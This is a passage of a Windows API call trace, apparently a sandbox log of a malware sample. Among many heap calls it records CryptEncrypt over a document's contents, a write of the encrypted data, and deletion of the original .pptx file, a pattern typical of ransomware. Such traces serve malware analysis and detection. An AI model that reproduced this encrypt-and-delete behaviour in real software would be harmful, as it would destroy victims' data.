out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ed8 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0215.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0215.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0215.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0215.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.960] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaba28 [0215.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.960] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0216.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0216.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0216.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0216.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0216.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0216.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0216.013] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0216.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0216.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0216.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0216.014] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1688a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x16890) returned 1 [0216.014] CharLowerBuffW (in: lpsz="byte[92304]", cchLength=0xb | out: lpsz="byte[92304]") returned 0xb [0216.016] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.016] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.016] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0216.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaba40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0216.016] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3867020*, pdwDataLen=0x8cef60*=0x1688a, dwBufLen=0x16890 | out: pbData=0x3867020*, pdwDataLen=0x8cef60*=0x16890) returned 1 [0216.019] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0216.019] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0216.019] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0216.019] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0216.022] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.022] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.033] WriteFile (in: hFile=0x504, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x16890, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x16890, lpOverlapped=0x0) returned 1 [0216.035] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0216.035] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0216.035] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.035] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0216.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab938, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0216.036] CryptDestroyKey (hKey=0x9e2238) returned 1 [0216.036] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0216.036] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0216.036] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0216.036] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0216.036] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.036] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.036] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0216.036] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0216.036] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0216.036] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0216.036] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0216.036] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0216.036] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.036] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.036] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0216.036] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0216.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0216.037] CryptReleaseContext (hProv=0xa7c220, dwFlags=0x0) returned 1 [0216.037] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0216.037] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0216.037] FreeLibrary (hLibModule=0x76390000) returned 1 [0216.037] CloseHandle (hObject=0x510) returned 1 [0216.039] CloseHandle (hObject=0x504) returned 1 [0216.042] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0216.042] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0216.042] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/lmvGT20EAt7X97ts9.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\lmvGT20EAt7X97ts9.pptx", lpFilePart=0x8cedf4*="lmvGT20EAt7X97ts9.pptx") returned 0x30 [0216.042] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\lmvGT20EAt7X97ts9.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lmvgt20eat7x97ts9.pptx")) returned 0x20 [0216.042] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\lmvGT20EAt7X97ts9.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d875f0, ftCreationTime.dwHighDateTime=0x1d5541d, ftLastAccessTime.dwLowDateTime=0x2e8b89d0, ftLastAccessTime.dwHighDateTime=0x1d54bdd, ftLastWriteTime.dwLowDateTime=0x2e8b89d0, ftLastWriteTime.dwHighDateTime=0x1d54bdd, nFileSizeHigh=0x0, nFileSizeLow=0x1688a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="lmvGT20EAt7X97ts9.pptx", cAlternateFileName="LMVGT2~1.PPT")) returned 0x9e1bf8 [0216.043] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\lmvGT20EAt7X97ts9.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lmvgt20eat7x97ts9.pptx")) returned 1 [0216.045] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d875f0, ftCreationTime.dwHighDateTime=0x1d5541d, ftLastAccessTime.dwLowDateTime=0x2e8b89d0, ftLastAccessTime.dwHighDateTime=0x1d54bdd, ftLastWriteTime.dwLowDateTime=0x2e8b89d0, ftLastWriteTime.dwHighDateTime=0x1d54bdd, nFileSizeHigh=0x0, nFileSizeLow=0x1688a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="lmvGT20EAt7X97ts9.pptx", cAlternateFileName="LMVGT2~1.PPT")) returned 0 [0216.045] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0216.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854b00 | out: hHeap=0x2af0000) returned 1 [0216.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0216.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0216.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0216.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0216.046] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0216.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0216.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0216.047] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0216.047] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0216.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0216.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854b78 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0216.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0216.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: 